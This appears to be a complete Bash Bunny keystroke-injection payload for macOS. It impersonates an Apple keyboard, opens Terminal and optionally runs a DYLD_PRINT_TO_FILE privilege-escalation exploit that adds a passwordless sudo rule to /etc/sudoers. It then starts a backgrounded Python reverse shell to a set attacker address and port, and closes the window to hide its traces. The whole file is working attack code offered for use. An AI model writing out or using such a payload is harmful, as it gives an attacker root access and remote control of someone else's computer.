LED B
#Set your Variables, bro
DYLD_ROOT=true
LHOST=192.168.17.12
LPORT=4444

LANGUAGE='us'

# Gimme a Keyboard please. Thanks.
ATTACKMODE HID VID_0X05AC PID_0X021E
LED R G B

# Get a terminal
QUACK DELAY 400
QUACK GUI SPACE
QUACK DELAY 300
QUACK STRING terminal
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 400

# optional DYLD exploit script
if $DYLD_ROOT; then
 LED R
 QUACK SPACE
 QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s
 QUACK ENTER
 QUACK DELAY 200
 QUACK ENTER
 QUACK ENTER
 QUACK ENTER
 QUACK ENTER
 QUACK DELAY 200
fi

# python reverse shell
QUACK SPACE
QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\)
QUACK ENTER
QUACK DELAY 200
QUACK SPACE
QUACK STRING clear
QUACK ENTER
QUACK GUI q
QUACK DELAY 100
QUACK ENTER

# Green is the official Light of "finished"
LED G